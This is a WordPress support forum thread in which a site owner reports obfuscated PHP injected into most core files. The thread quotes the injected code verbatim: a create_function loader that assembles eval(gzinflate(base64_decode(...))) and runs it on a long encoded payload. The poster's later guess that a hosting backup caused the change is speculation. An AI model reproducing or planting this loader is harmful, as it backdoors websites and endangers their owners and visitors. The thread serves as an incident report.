WordPress.org

Ready to get started?Download WordPress

Forums

WordPress Core files got updated? (2 posts)

  1. KalenJohnson
    Member
    Posted 1 year ago #

    Hey everyone,

    so I woke up to one of our WP sites barely working. The header wasn't being called, so the page was unstyled. Trying to log in showed an error in the wp-admin/includes/plugin.php file. So I went to check it out. This had been added to the top of the file:

    $md5 = "55a9da694280d920efaa55b8c650a474";
    $ad = array('(','r',"v",'z','g','4','6',"n",'s',"i",'e',"_",'a',";","d","o",'l','$','f',")",'t','b','c');
    $bd0 = create_function('$'.'v',$ad[10].$ad[2].$ad[12].$ad[16].$ad[0].$ad[4].$ad[3].$ad[9].$ad[7].$ad[18].$ad[16].$ad[12].$ad[20].$ad[10].$ad[0].$ad[21].$ad[12].$ad[8].$ad[10].$ad[6].$ad[5].$ad[11].$ad[14].$ad[10].$ad[22].$ad[15].$ad[14].$ad[10].$ad[0].$ad[17].$ad[2].$ad[19].$ad[19].$ad[19].$ad[13]);
    $bd0('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');

    That, or something like that, had been added to practically every WP core php file there was.

    Anyone seen something like this? I don't know if it was WP, if it was a security plugin, or a hack masquerading as a security function. It broke WP good though.

    I should add that we had a backup from 2 days ago, so I uploaded all the core WP files and all is good.

  2. KalenJohnson
    Member
    Posted 1 year ago #

    I think this might have happened when I did a full backup with Host Gator. Seems odd, but it makes sense with the variables that were created. Just surprised it went in and edited every one of our PHP files...

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags